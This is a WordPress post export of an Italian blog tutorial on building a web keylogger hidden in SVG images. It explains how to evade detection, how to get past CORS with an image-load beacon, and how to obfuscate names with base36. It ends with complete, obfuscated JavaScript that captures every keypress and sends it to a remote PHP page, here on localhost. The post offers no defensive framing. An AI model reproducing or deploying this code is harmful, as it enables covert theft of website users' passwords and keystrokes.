{"id":443,"date":"2023-06-12T17:10:13","date_gmt":"2023-06-12T15:10:13","guid":{"rendered":"https:\/\/koban3.me\/?p=443"},"modified":"2023-06-13T14:37:00","modified_gmt":"2023-06-13T12:37:00","slug":"svg-keylogger","status":"publish","type":"post","link":"https:\/\/koban3.me\/index.php\/2023\/06\/12\/svg-keylogger\/","title":{"rendered":"Svg keylogger"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t

L'idea<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

L’obiettivo \u00e8 semplice: creare un keylogger che funzioni all’interno di pagine web. <\/p>

Non \u00e8 sicuramente un’idea originale, ma pu\u00f2 essere un ottimo spunto per approfondire certe dinamiche.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t

Struttura<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Il codice di per se \u00e8 relativamente semplice, si tratta “solo” di agganciare un handler all’evento “keydown<\/i>” dell’oggetto “window<\/i>” e inviare ad una pagina remota il tasto premuto.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t

Evasione<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Js in SVG<\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Dato che le immagini SVG permettono di incorporare del codice javascript ed eseguirlo, ho deciso di sfruttare questa capacit\u00e0 per rendere pi\u00f9 complessa l’identificazione e cercare di bypassare alcuni controlli di sicurezza.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Attenzione! <\/b>Il codice javascript incorporato negli SVG viene eseguito solo se l’immagine viene inserita nella pagina come elemento “object”<\/i><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

CORS bypass
<\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

“CORS” (Cross-Origin Resource Sharing), il mostro con cui chi sviluppa applicazioni web si \u00e8 scontrato almeno una volta nella vita.
<\/i><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Per chi non sa di cosa sto parlando, in parole povere si tratta della funzionalit\u00e0 che si occupa di gestire lo scambio di risorse tra domini differenti.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Dato che stiamo progettando un software che potenzialmente invier\u00e0 i dati ad un dominio esterno a quello dove lo script \u00e8 in esecuzione, i blocchi di sicurezza sono in agguato. Ma dato che il nostro scopo \u00e8 solo quello di far uscire dei dati e non necessariamente leggere la risposta della chiamata, il problema si pu\u00f2 risolvere alla radice tramite un trick molto semplice: simulare l’inserimento di una nuova immagine nella pagina, impostando l’url della risorsa con la pagina che deve recepire i dati del keylogger. In automatico verr\u00e0 scatenato il caricamento della nuova “immagine” da parte del browser e i dati verranno inviati bypassando ogni controllo di sicurezza.
<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Offuscamento
<\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Di tecniche per offuscare il codice ne esistono a palate. In questo esempio ho voluto inserire un minimo di “confusione” nascondendo i nomi usando come sorgente una stringa contenente le lettere dell’alfabeto e i numeri codificati in base36 <\/i>(per approfondimento: base-36-why-how-its-important<\/a>).<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t
\n\t\t\t
<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t

Il codice<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Keylogger
<\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Per semplicit\u00e0 ho sviluppato e testato il codice direttamente all’interno di una pagina html.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t
\n\t\t\t\t\t
<script type=" text\/javascript ">\nlet b = 30483235087530204251026473460499750369628008625670311705n.toString(36);\n\naddEventListener([b[10], b[4], b[24], b[3], b[14], b[22], b[13]].join(''), function(e) \n{\n    setTimeout(() =>\n    {\n        new Image().src = 'http:\/\/localhost\/test_svg_js\/robocaptcha.php?e=' + encodeURIComponent(btoa(e[[b[0xA], b[0x4], b[0x18]].join('')]));\n    }, \n    Math.random() * 1800 + 200);\n});\n<\/script> <\/code><\/pre>